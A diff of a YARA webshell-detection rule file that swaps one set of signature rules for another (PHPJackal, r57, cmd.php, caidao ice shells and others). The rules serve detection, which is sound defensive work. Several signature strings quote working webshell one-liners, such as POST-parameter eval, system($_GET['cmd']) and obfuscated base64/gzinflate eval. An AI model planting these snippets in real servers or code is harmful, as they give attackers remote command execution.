+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1527-L1541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
-		logic_hash = "235e4062a9b9ebdf7dd0b8a2cb3b16ba7688a75b90d8c527344cf9605304838d"
+		hash = "d93c62a0a042252f7531d8632511ca56"
+		logic_hash = "4faac0b22fec809f2100bad200ba1f9fb9e16fab743e1b1cbfe0b80c6d2fee32"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Server_Variables
+rule SIGNATURE_BASE_Webshell_Jsp_List
 {
 	meta:
-		description = "Web Shell - file Server Variables.asp"
+		description = "Web Shell - file list.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L450-L464"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1542-L1557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "47fb8a647e441488b30f92b4d39003d7"
-		logic_hash = "2a85301f1d6e4c457ff0a1b2a08eb6f054905993a0667087f37b9a7352e38911"
+		hash = "1ea290ff4259dcaeb680cec992738eda"
+		logic_hash = "5641bff0ec161fe72e502641b6138186d541ebfcbf499e0295a61f9f6f085654"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
-		$s9 = "Variable Name</B></font></p>" fullword
+		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice_2
+rule SIGNATURE_BASE_Webshell_Phpjackal_V1_5
 {
 	meta:
-		description = "Web Shell - file ice.php"
+		description = "Web Shell - file PHPJackal v1.5.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L465-L478"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1558-L1572"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d6335247f58e0a5b03e17977888f5f2"
-		logic_hash = "57c3c369abd826d676290300d8df2d890b777fa1f0e1156654062159a4228db7"
+		hash = "d76dc20a4017191216a0315b7286056f"
+		logic_hash = "457bc71cb8e684dafb14b1c5d2faa4366cedce5eba9545493be2b1d49daf98b6"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Mdb
+rule SIGNATURE_BASE_Webshell_Customize
 {
 	meta:
-		description = "Web Shell - file mdb.asp"
+		description = "Web Shell - file customize.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L479-L492"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1573-L1586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
-		logic_hash = "89f7692acd754992f9379b9b4661a01d6ab95cb85a3c2699928aa5ed3a3ac8c5"
+		hash = "d55578eccad090f30f5d735b8ec530b1"
+		logic_hash = "462d97427793ef6e897b33f4fd02d452ad8cd11ddef21aa25d13efc981eb3afb"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<% execute request(\"ice\")%>a " fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Guige
+rule SIGNATURE_BASE_Webshell_S72_Shell_V1_1_Coding
 {
 	meta:
-		description = "Web Shell - file guige.jsp"
+		description = "Web Shell - file s72 Shell v1.1 Coding.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L493-L506"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1587-L1600"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2c9f2dafa06332957127e2c713aacdd2"
-		logic_hash = "9d71095b5c709dfdd8b5fcebcaa4493d9c93e841e85cda2e2255e0c15ea83659"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+		logic_hash = "fd200d8aa347242546a1da311edc61ceebaec5f7d6b4fe2f49f069b36689f547"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy2010
+rule SIGNATURE_BASE_Webshell_Jsp_Sys3
 {
 	meta:
-		description = "Web Shell - file phpspy2010.php"
+		description = "Web Shell - file sys3.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L507-L522"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1601-L1616"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14ae0e4f5349924a5047fed9f3b105c5"
-		logic_hash = "b3acef196b30cf9afe24c81860bedff69fc5652c514aa36aba85d16b12bcc432"
+		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+		logic_hash = "14b0ac1b1b8538b0c05dcd0a8b7129fdcad2e595ea00630bd55cee6dff596d4f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "eval(gzinflate(base64_decode("
-		$s5 = "//angel" fullword
-		$s8 = "$admin['cookiedomain'] = '';" fullword
+		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ice
+rule SIGNATURE_BASE_Webshell_Jsp_Guige02
 {
 	meta:
-		description = "Web Shell - file ice.asp"
+		description = "Web Shell - file guige02.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L523-L536"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1617-L1631"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d141e011a92f48da72728c35f1934a2b"
-		logic_hash = "524419e802d3cb6ac310565af22ec28044984aa4b1b2ee1cfbd292afd071709c"
+		hash = "a3b8b2280c56eaab777d633535baf21d"
+		logic_hash = "c214e50b209970c03d389d97673901ec44b2727e5c7588e5e4d0a644cc691423"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Drag_System
+rule SIGNATURE_BASE_Webshell_Php_Ghost
 {
 	meta:
-		description = "Web Shell - file system.jsp"
+		description = "Web Shell - file ghost.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L537-L550"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1632-L1647"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "15ae237cf395fb24cf12bff141fb3f7c"
-		logic_hash = "8ea8d9d64521f47f1396e4f4d6c8f4a71fa1a643799ec408e1d2e0f255dc4996"
+		hash = "38dc8383da0859dca82cf0c943dbf16d"
+		logic_hash = "9a7635d313345e7b7cb7424726ed62015afd78412b504e406155f85c4cdf623f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Darkblade1_3_Asp_Indexx
+rule SIGNATURE_BASE_Webshell_Winx_Shell
 {
 	meta:
-		description = "Web Shell - file indexx.asp"
+		description = "Web Shell - file WinX Shell.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L551-L564"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1648-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7f46693648f534c2ca78e3f21685707"
-		logic_hash = "57cfe09d53d42ee9d909a3894b8a3362209c1972c7d96ae5fdc61681c2998a89"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+		logic_hash = "e6dd5178cafccca751dd3f2e36206acd214a65b2e0783a738a104b3dc680ca21"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell3
+rule SIGNATURE_BASE_Webshell_Crystal_Crystal
 {
 	meta:
-		description = "Web Shell - file phpshell3.php"
+		description = "Web Shell - file Crystal.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L565-L580"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1663-L1677"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "76117b2ee4a7ac06832d50b2d04070b8"
-		logic_hash = "868b1b69fab3ec6fcfa15557075f313f4af0ec9cd15f41bb9dcc9bc26fc17f93"
+		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+		logic_hash = "735332a2ec7df65cca4ca69e702c5893d302a01c7ee7b84d01a1e6ab9646de93"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
-		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
-		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Hsxa
+rule SIGNATURE_BASE_Webshell_R57_1_4_0
 {
 	meta:
-		description = "Web Shell - file hsxa.jsp"
+		description = "Web Shell - file r57.1.4.0.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L581-L594"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1678-L1694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
-		logic_hash = "7f79b66d87f638bc09ee576de4dc4a8c5b1da7c406d318eeff7a4221c35d2313"
+		hash = "574f3303e131242568b0caf3de42f325"
+		logic_hash = "cb48621c572d529b8dc634e7b6360257ad4fce9664bfca7ee7c0101be42d2c24"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s7 = "@ini_restore(\"disable_functions\");" fullword
+		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Utils
+rule SIGNATURE_BASE_Webshell_Asp_Ajn
 {
 	meta:
-		description = "Web Shell - file utils.jsp"
+		description = "Web Shell - file ajn.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L595-L609"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1696-L1710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9827ba2e8329075358b8e8a53e20d545"
-		logic_hash = "90a5b64e59306bdffc5a89f5d86a2dc7a17669021d863e2a5ecea13d65c19053"
+		hash = "aaafafc5d286f0bff827a931f6378d04"
+		logic_hash = "0a6c9a210c0337d6b984bcf6cd7f14103a0f6f5d38a26c789519c2b1629aaede"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_01
+rule SIGNATURE_BASE_Webshell_Php_Cmd
 {
 	meta:
-		description = "Web Shell - file 01.asp"
+		description = "Web Shell - file cmd.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L610-L623"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1711-L1726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "61a687b0bea0ef97224c7bd2df118b87"
-		logic_hash = "e057800013a9a8f4c3ecbe4e27c14e904700548e6ad9dc1f00313c7a3de7fd2d"
-		score = 50
+		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+		logic_hash = "d9a0802f6fd7047ba5477f6bba61c4ac02cabfce06270fdbd8e8e68a693ccf68"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(\"pass\")%>" fullword
+		$s0 = "if($_GET['cmd']) {" fullword
+		$s1 = "// cmd.php = Command Execution" fullword
+		$s7 = "  system($_GET['cmd']);" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_404
+rule SIGNATURE_BASE_Webshell_Asp_List
 {
 	meta:
-		description = "Web Shell - file 404.asp"
+		description = "Web Shell - file list.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L624-L637"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1727-L1741"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
-		logic_hash = "3db951af36ed3d08bc10b4c3fc2e67481f005580fb76f66b6ec5789ed6e2efdb"
+		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+		logic_hash = "9c8bdeb5992015b26fbee418ed6e6b7c6b0901f26bddf9dc26706c0b63ea9c95"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_Cnseay02_1
+rule SIGNATURE_BASE_Webshell_PHP_Co
 {
 	meta:
-		description = "Web Shell - file webshell-cnseay02-1.php"
+		description = "Web Shell - file co.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L638-L651"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1742-L1756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95fc76081a42c4f26912826cb1bd24b1"
-		logic_hash = "9950fb7c26dfb25665093dbcf5c4a9dcf65466783509a3caa11c2c96d177d855"
+		hash = "62199f5ac721a0cb9b28f465a513874c"
+		logic_hash = "3fab3e97d10b6c56fb7df8bcd520bda318fc127a620c5aafba09cb36ffd6a8df"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Fbi
+rule SIGNATURE_BASE_Webshell_PHP_150
 {
 	meta:
-		description = "Web Shell - file fbi.php"
+		description = "Web Shell - file 150.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L652-L665"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1757-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1fb32f8e58c8deb168c06297a04a21f1"
-		logic_hash = "de8584ae83ee3e23f4ce00ccd73f75b4568d6a4544af45b83784a9a0c34d42e3"
+		hash = "400c4b0bed5c90f048398e1d268ce4dc"
+		logic_hash = "139e3d6aa3cd2b6a9731a6cc14c921f9fd82ff7ca79d156f1ff6bc544897fb12"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+		$s0 = "HJ3HjqxclkZfp"
+		$s1 = "<? eval(gzinflate(base64_decode('" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_B374Kphp_B374K
+rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp_2
 {
 	meta:
-		description = "Web Shell - file B374k.php"
+		description = "Web Shell - file cmdjsp.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L666-L682"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1772-L1786"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bed7388976f8f1d90422e8795dff1ea6"
-		logic_hash = "1f0fc5e309dd67a11d6ba9b698fd9ca3c7e6616545c220de79aaa3b63f0ad931"
+		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+		logic_hash = "83be82e260adcff9d3d11344c363f6b5da331339ffe78e561cea9ab09b209030"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Http://code.google.com/p/b374k-shell" fullword
-		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
-		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
-		$s4 = "B374k Vip In Beautify Just For Self" fullword
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cmd_Asp_5_1
+rule SIGNATURE_BASE_Webshell_PHP_C37
 {
 	meta:
-		description = "Web Shell - file cmd-asp-5.1.asp"
+		description = "Web Shell - file c37.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L683-L696"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1787-L1801"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-		logic_hash = "1ff4ae8c08cec4605594e97d6c077d4808d3a73c04ddf6a51952252dd2d01cf4"
+		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+		logic_hash = "b93394f4e05cc96c31a8adcb0981aa8b069780893c469b41ece3d3ce92c42251"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Dodo_Zip
+rule SIGNATURE_BASE_Webshell_PHP_B37
 {
 	meta:
-		description = "Web Shell - file zip.php"
+		description = "Web Shell - file b37.php"
 		author = "Florian Roth (Nextron Systems)"
